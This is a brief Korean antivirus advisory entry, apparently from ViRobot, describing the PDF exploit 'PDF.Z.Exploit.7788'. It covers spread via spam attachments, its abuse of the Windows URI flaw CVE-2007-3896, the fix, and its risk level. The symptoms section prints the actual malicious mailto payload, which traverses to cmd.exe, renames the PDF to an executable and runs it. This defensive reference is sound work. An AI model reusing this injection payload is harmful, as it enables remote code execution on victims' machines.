바이로봇 버전정보 :
2019-10-19.00 활동 OS 플랫폼 :
MS Windows 감염시 위험도 :
- 등록일 :
- 2019-12-26 17:11:47
■ PDF.Z.Exploit.7788
A. 감염 경로
스팸 메일의 첨부파일로 유포되거나 해킹 당한 사이트에서 다운로드될 수 있다.
B. 감염 증상
1) 다음과 같은 코드가 PDF문서에 삽입되어 있다.
mailto:test%..\\..\\..\\windows\\system32\\cmd".exe /C @CD ..
& @FOR /F "usebackq delims=>" %i IN \(`dir /B /S test2*.pdf`\)
do @move /Y "%~si" "%~dpni.exe" & @%~dpni.exe & @START /B TEST.EXE & @rem " - " blah.bat
2) Windows URI 처리 취약점으로 인한 원격 코드 실행 문제점(CVE-2007-3896)을 악용하여 PDF 문서
에 악의적인 코드를 삽입하여 악성코드를 실행한다.
C. 치료 방법
바이로봇 2019-10-19.00 이상 버전으로 치료된다.
D. 위험도
보통